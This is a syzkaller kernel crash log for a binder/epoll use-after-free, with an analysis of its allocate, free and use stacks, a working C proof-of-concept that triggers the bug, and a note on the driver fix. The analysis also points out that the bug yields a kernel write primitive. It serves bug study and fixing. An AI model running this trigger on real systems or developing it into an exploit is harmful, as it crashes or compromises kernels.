[   17.172063] random: sshd: uninitialized urandom read (32 bytes read, 33 bits of entropy available)
[ ok ] Starting OpenBSD Secure Shell server: sshd.
[ ok ] Starting file context maintaining daemon: restorecond.

Debian GNU/Linux 7 syzkaller ttyS0

syzkaller login: [   20.795439] random: sshd: uninitialized urandom read (32 bytes read, 37 bits of entropy available)
[   21.116230] random: sshd: uninitialized urandom read (32 bytes read, 37 bits of entropy available)
[   22.024409] random: sshd: uninitialized urandom read (32 bytes read, 111 bits of entropy available)
[   22.185610] random: sshd: uninitialized urandom read (32 bytes read, 115 bits of entropy available)
Warning: Permanently added '10.128.15.234' (ECDSA) to the list of known hosts.
[   27.543269] random: sshd: uninitialized urandom read (32 bytes read, 119 bits of entropy available)
executing program
[   27.640165] ==================================================================
[   27.647568] BUG: KASAN: use-after-free in __lock_acquire+0x387e/0x4b50
[   27.654203] Read of size 8 at addr ffff8801d0063738 by task syzkaller556576/3325
[   27.661700] 
[   27.663299] CPU: 1 PID: 3325 Comm: syzkaller556576 Not tainted 4.4.111-g3301b55 #17
[   27.671058] Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 01/01/2011
[   27.680392]  0000000000000000 5114cc09b5429541 ffff8801d14af850 ffffffff81d0509d
[   27.688381]  ffffea0007401880 ffff8801d0063738 0000000000000000 ffff8801d0063738
[   27.696376]  0000000000000000 ffff8801d14af888 ffffffff814fd433 ffff8801d0063738
[   27.704342] Call Trace:
[   27.706922]  [] dump_stack+0xc1/0x124
[   27.712287]  [] print_address_description+0x73/0x260
[   27.718937]  [] kasan_report+0x285/0x370
[   27.724541]  [] ? __lock_acquire+0x387e/0x4b50
[   27.730656]  [] __asan_report_load8_noabort+0x14/0x20
[   27.737393]  [] __lock_acquire+0x387e/0x4b50
[   27.743360]  [] ? __lock_acquire+0xb5f/0x4b50
[   27.749408]  [] ? debug_check_no_locks_freed+0x2c0/0x2c0
[   27.756395]  [] ? trace_hardirqs_on_caller+0x38b/0x590
[   27.763211]  [] ? debug_check_no_locks_freed+0x2c0/0x2c0
[   27.770196]  [] ? debug_check_no_locks_freed+0x2c0/0x2c0
[   27.777179]  [] lock_acquire+0x15e/0x460
[   27.782784]  [] ? remove_wait_queue+0x14/0x40
[   27.788819]  [] _raw_spin_lock_irqsave+0x4e/0x70
[   27.795111]  [] ? remove_wait_queue+0x14/0x40
[   27.801159]  [] remove_wait_queue+0x14/0x40
[   27.807029]  [] ep_unregister_pollwait.isra.6+0xa8/0x220
[   27.814024]  [] ? ep_unregister_pollwait.isra.6+0x114/0x220
[   27.821281]  [] ? ep_free+0x1c0/0x1c0
[   27.826622]  [] ep_free+0x93/0x1c0
[   27.831697]  [] ? ep_free+0x1c0/0x1c0
[   27.837042]  [] ep_eventpoll_release+0x44/0x60
[   27.843171]  [] __fput+0x233/0x6d0
[   27.848259]  [] ____fput+0x15/0x20
[   27.853334]  [] task_work_run+0x104/0x180
[   27.859012]  [] do_exit+0x871/0x2a20
[   27.864264]  [] ? handle_mm_fault+0x192d/0x3190
[   27.870464]  [] ? handle_mm_fault+0x3f2/0x3190
[   27.876596]  [] ? release_task+0x1240/0x1240
[   27.882548]  [] do_group_exit+0x108/0x320
[   27.888225]  [] SyS_exit_group+0x1d/0x20
[   27.893815]  [] ? do_group_exit+0x320/0x320
[   27.899666]  [] do_fast_syscall_32+0x314/0x890
[   27.905785]  [] sysenter_flags_fixed+0xd/0x17
[   27.911805] 
[   27.913400] Allocated by task 3325:
[   27.916989]  [] save_stack_trace+0x26/0x50
[   27.922870]  [] save_stack+0x43/0xd0
[   27.928228]  [] kasan_kmalloc+0xad/0xe0
[   27.933864]  [] kmem_cache_alloc_trace+0x100/0x2b0
[   27.940435]  [] binder_get_thread+0x181/0x7a0
[   27.946573]  [] binder_poll+0x4a/0x210
[   27.952121]  [] SyS_epoll_ctl+0x10b1/0x2050
[   27.958082]  [] do_fast_syscall_32+0x314/0x890
[   27.964305]  [] sysenter_flags_fixed+0xd/0x17
[   27.970453] 
[   27.972059] Freed by task 3325:
[   27.975303]  [] save_stack_trace+0x26/0x50
[   27.981191]  [] save_stack+0x43/0xd0
[   27.986549]  [] kasan_slab_free+0x72/0xc0
[   27.992342]  [] kfree+0xfc/0x300
[   27.997368]  [] binder_thread_dec_tmpref+0x1c1/0x250
[   28.004120]  [] binder_thread_release+0x27d/0x540
[   28.010607]  [] binder_ioctl+0xb94/0x12e0
[   28.016425]  [] compat_SyS_ioctl+0x28a/0x2540
[   28.022572]  [] do_fast_syscall_32+0x314/0x890
[   28.028799]  [] sysenter_flags_fixed+0xd/0x17
[   28.034940] 
[   28.036540] The buggy address belongs to the object at ffff8801d0063680
[   28.036540]  which belongs to the cache kmalloc-512 of size 512
[   28.049171] The buggy address is located 184 bytes inside of
[   28.049171]  512-byte region [ffff8801d0063680, ffff8801d0063880)
[   28.061011] The buggy address belongs to the page:
[   28.477005] kasan: CONFIG_KASAN_INLINE enabled
[   28.481472] kasan: GPF could be caused by NULL-ptr deref or user memory access
general protection fault: 0000 [#1] PREEMPT SMP KASAN
[   28.494380] Dumping ftrace buffer:
[   28.497908]    (ftrace buffer empty)
[   28.501609] Modules linked in:
[   28.504923] CPU: 0 PID: 0 Comm: swapper/0 Not tainted 4.4.111-g3301b55 #17
[   28.511929] Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 01/01/2011
[   28.521376] task: ffffffff84217840 task.stack: ffffffff84200000
[   28.527427] RIP: 0010:[]  [] debug_object_deactivate+0x1a6/0x3c0
[   28.536840] RSP: 0018:ffff8801db207d10  EFLAGS: 00010803
[   28.542298] RAX: 0000000000000096 RBX: e90006e0d8e80b0f RCX: ffff8801d2bc1030
[   28.549568] RDX: 1d2000dc1b1d0164 RSI: ffffffff842c2560 RDI: e90006e0d8e80b27
[   28.556836] RBP: ffff8801db207dd8 R08: 1ffff1003aa8d50d R09: ffffffff85132d90
[   28.564116] R10: 0000000000000001 R11: 1ffff1003b640f68 R12: 1ffff1003b640fa6
[   28.571467] R13: 0000000000000004 R14: dffffc0000000000 R15: ffffffff85774b88
[   28.578730] FS:  0000000000000000(0000) GS:ffff8801db200000(0000) knlGS:0000000000000000
[   28.586952] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[   28.592829] CR2: 0000560ade1c0100 CR3: 00000001d1622000 CR4: 0000000000160670
[   28.600092] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[   28.607356] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
[   28.614615] Stack:
[   28.616750]  0000000000000000 0000000000000000 ffffffff842c2560 ffff8801d2bc1030
[   28.624812]  0000000041b58ab3 ffffffff83fcca49 ffffffff81d66eb0 ffffffff812a1f7c
[   28.632835]  ffffffff00000000 ffffffff00000000 0000000000000000 ffffffff83868f20
[   28.640855] Call Trace:
[   28.643423] 
[   28.645479]  [] ? debug_object_activate+0x500/0x500
[   28.652351]  [] ? run_timer_softirq+0x60c/0xbb0
[   28.658600]  [] ? _raw_spin_unlock_irq+0x27/0x50
[   28.664935]  [] ? init_timer_key+0x360/0x360
[   28.670908]  [] ? init_timer_key+0x360/0x360
[   28.676882]  [] ? tcp_write_timer_handler+0x6d0/0x6d0
[   28.683656]  [] run_timer_softirq+0x336/0xbb0
[   28.689714]  [] ? msleep+0xe0/0xe0
[   28.694819]  [] __do_softirq+0x24d/0xa59
[   28.700456]  [] irq_exit+0x119/0x140
[   28.705732]  [] smp_apic_timer_interrupt+0x7b/0xa0
[   28.712230]  [] apic_timer_interrupt+0xa0/0xb0
[   28.718365] 
[   28.720431]  [] ? native_safe_halt+0x6/0x10
[   28.726615]  [] default_idle+0x55/0x3c0
[   28.732153]  [] arch_cpu_idle+0xa/0x10
[   28.737608]  [] default_idle_call+0x48/0x70
[   28.743516]  [] cpu_startup_entry+0x605/0x820
[   28.749577]  [] ? call_cpuidle+0xe0/0xe0
[   28.755199]  [] rest_init+0x189/0x190
[   28.760557]  [] start_kernel+0x6b9/0x6ee
[   28.766177]  [] ? thread_stack_cache_init+0xb/0xb
[   28.772580]  [] ? early_idt_handler_array+0x120/0x120
[   28.779352]  [] ? early_idt_handler_array+0x120/0x120
[   28.786128]  [] x86_64_start_reservations+0x2a/0x2c
[   28.792704]  [] x86_64_start_kernel+0x140/0x163
[   28.798924] Code: eb 1a 48 89 da 48 c1 ea 03 42 80 3c 32 00 0f 85 86 01 00 00 48 8b 1b 48 85 db 74 7a 48 8d 7b 18 41 83 c5 01 48 89 fa 48 c1 ea 03 <42> 80 3c 32 00 0f 85 3c 01 00 00 48 3b 4b 18 75 c6 48 8d 7b 10 
[   28.826192] RIP  [] debug_object_deactivate+0x1a6/0x3c0
[   28.833243]  RSP 
[   28.836861] ---[ end trace db60c1ef689bca77 ]---
[   28.841613] Kernel panic - not syncing: Fatal exception in interrupt
[   29.764181] PANIC: double fault, error_code: 0x0
[   29.768969] CPU: 1 PID: 3325 Comm: syzkaller556576 Tainted: G      D         4.4.111-g3301b55 #17
[   29.777965] Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 01/01/2011
[   29.787410] task: ffff8801d19a0000 task.stack: ffff8801d14a8000
[   29.793444] RIP: 0010:[]  [] dump_page_badflags+0x1a/0x250
[   29.802289] RSP: 0018:ffff880100000000  EFLAGS: 00010086
[   29.807970] RAX: ffff8801d19a0000 RBX: ffffea0007401880 RCX: ffffffff8148f980
[   29.815218] RDX: 0000000000000000 RSI: ffffffff838a83a0 RDI: ffffea0007401880
[   29.822718] RBP: ffff880100000030 R08: 0000000000000001 R09: 0000000000000000
[   29.829974] R10: 0000000000000002 R11: fffffbfff0ad781e R12: 0000000000000000
[   29.837218] R13: ffffffff838a83a0 R14: 0000000000000000 R15: 0000000000000000
[   29.844478] FS:  0000000000000000(0000) GS:ffff8801db300000(0000) knlGS:0000000000000000
[   29.852672] CS:  0010 DS: 002b ES: 002b CR0: 0000000080050033
[   29.858524] CR2: ffff8800fffffff8 CR3: 000000000420c000 CR4: 0000000000160670
[   29.865765] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[   29.873005] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
[   29.880242] Stack:
[   29.882363] 
[   29.883960] Call Trace:
[   29.886510] 
[   29.888547] Code: e2 06 00 e9 1d fd ff ff 66 0f 1f 84 00 00 00 00 00 55 48 89 e5 41 57 41 56 41 55 49 89 f5 41 54 49 89 d4 53 48 89 fb 48 83 ec 08 61 06 ed ff 48 8d 7b 10 48 b8 00 00 00 00 00 fc ff df 48 89 
[   29.973203] Shutting down cpus with NMI
[   29.977652] Dumping ftrace buffer:
[   29.981160]    (ftrace buffer empty)
[   29.984837] Kernel Offset: disabled
[   29.988431] Rebooting in 86400 seconds..
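Reading the report: the three KASAN stacks describe one 512-byte object and one syscall sequence, all in the same 32-bit (compat) task, PID 3325.

Allocated by task 3325: SyS_epoll_ctl -> binder_poll -> binder_get_thread. Adding a binder fd to an epoll set made the driver kmalloc a per-thread struct (kmalloc-512) and, through the poll callback, queue an epoll wait entry on that struct's wait queue head.

Freed by task 3325: compat_SyS_ioctl -> binder_ioctl -> binder_thread_release -> binder_thread_dec_tmpref -> kfree. A binder ioctl released the thread and freed the struct while epoll's wait entry still pointed into it.

Use: SyS_exit_group -> do_exit -> task_work_run -> __fput -> ep_eventpoll_release -> ep_free -> ep_unregister_pollwait -> remove_wait_queue -> _raw_spin_lock_irqsave -> __lock_acquire. Closing the epoll fd at exit walks its wait entries and takes the spinlock of the freed wait queue head, 184 bytes into the freed region. Because remove_wait_queue also unlinks the entry with list operations on the dangling head, the same primitive is a kernel write into whatever now occupies that kmalloc-512 slot, not only a read; the log itself only shows the read that KASAN caught.

The general protection fault that follows on CPU 0 (debug_object_deactivate from a timer softirq, with the non-canonical value e90006e0d8e80b0f in RBX) and the double fault on CPU 1 inside dump_page_badflags come after the KASAN report; they are consistent with the freed slab memory having already been reused and corrupted, and the log gives no reason to treat them as a separate bug.

The program below is an added example, not the syzkaller reproducer and not code from the report. It issues the sequence the stacks record against a device path supplied by the caller. The log does not name the ioctl command; BINDER_THREAD_EXIT is the binder ioctl that calls binder_thread_release, and its number is taken from the binder UAPI header and redefined here so the file builds without Android headers. The status codes and function names are this example's own. On a host without the device it returns without touching the kernel; on a kernel with this bug it triggers the use-after-free at process exit, so run it only on a disposable test kernel.

```c
/* Added example: the alloc / free / use sequence from the KASAN report as a
 * user-space program. Not the original reproducer. Runs against the path the
 * caller passes; on a host without that device it does nothing harmful. */
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <sys/epoll.h>
#include <sys/ioctl.h>
#include <unistd.h>

/* From uapi/linux/android/binder.h: _IOW('b', 8, __s64). Redefined here
 * (assumption: int64_t has the same size as __s64) so the file builds on a
 * host without Android headers. Encodes to 0x40086208. */
#define BINDER_THREAD_EXIT _IOW('b', 8, int64_t)

/* Status codes of this example, so a caller can tell the paths apart. */
enum binder_uaf_status {
    BINDER_UAF_SEQUENCE_DONE = 0, /* alloc and free issued; use happens on close/exit */
    BINDER_UAF_NO_DEVICE = 1,     /* device could not be opened; kernel untouched */
    BINDER_UAF_EPOLL_FAILED = 2   /* epoll setup failed; fds closed again */
};

/* The ioctl request number the free step uses, exposed for checking. */
unsigned long binder_thread_exit_cmd(void)
{
    return (unsigned long)BINDER_THREAD_EXIT;
}

/* Steps 1 and 2 of the report, against the device at `dev`:
 *   1. epoll_ctl(EPOLL_CTL_ADD) on the binder fd -> binder_poll() ->
 *      binder_get_thread(): kmalloc of the thread struct, and an epoll wait
 *      entry queued on its wait queue head ("Allocated by task").
 *   2. ioctl(BINDER_THREAD_EXIT) -> binder_thread_release() -> kfree() of that
 *      struct while the epoll entry still points into it ("Freed by task").
 * Step 3 is not a call of its own: closing the epoll fd, here by process
 * exit (__fput -> ep_free -> remove_wait_queue), touches the freed wait queue
 * head, which is the 8-byte read KASAN flagged in __lock_acquire.
 * Both fds are deliberately left open so that exit performs step 3. */
int binder_uaf_sequence(const char *dev)
{
    int binder_fd = open(dev, O_RDWR | O_CLOEXEC);
    if (binder_fd < 0)
        return BINDER_UAF_NO_DEVICE;

    int epfd = epoll_create1(EPOLL_CLOEXEC);
    if (epfd < 0) {
        close(binder_fd);
        return BINDER_UAF_EPOLL_FAILED;
    }

    struct epoll_event ev = { .events = EPOLLIN, .data.fd = binder_fd };
    if (epoll_ctl(epfd, EPOLL_CTL_ADD, binder_fd, &ev) < 0) {   /* step 1 */
        close(epfd);
        close(binder_fd);
        return BINDER_UAF_EPOLL_FAILED;
    }

    /* Step 2. The return value is irrelevant: the kfree happens inside. */
    (void)ioctl(binder_fd, BINDER_THREAD_EXIT, 0);
    return BINDER_UAF_SEQUENCE_DONE;
}

int main(int argc, char **argv)
{
    if (argc < 2) {
        fprintf(stderr, "usage: %s /dev/binder   (only on a disposable test kernel)\n", argv[0]);
        fprintf(stderr, "BINDER_THREAD_EXIT = 0x%lx\n", binder_thread_exit_cmd());
        return 2;
    }
    int rc = binder_uaf_sequence(argv[1]);
    printf("status %d (0 = sequence issued, the use happens at exit)\n", rc);
    return rc;   /* returning from main closes the epoll fd: step 3 */
}
```

The original reproducer went through the 32-bit syscall entry (do_fast_syscall_32, compat_SyS_ioctl); that is incidental, the native 64-bit path reaches the same driver code. The fix pattern for this class of bug is on the driver side: before binder_thread_release frees the thread struct it must detach any poll waiters from thread->wait (the POLLFREE wakeup that epoll honours), so that ep_free no longer finds a dangling entry. Releasing a wait queue head from inside an object that poll() callers can still hold an entry on is the check worth repeating on any driver that implements .poll and frees per-thread or per-client state on an ioctl.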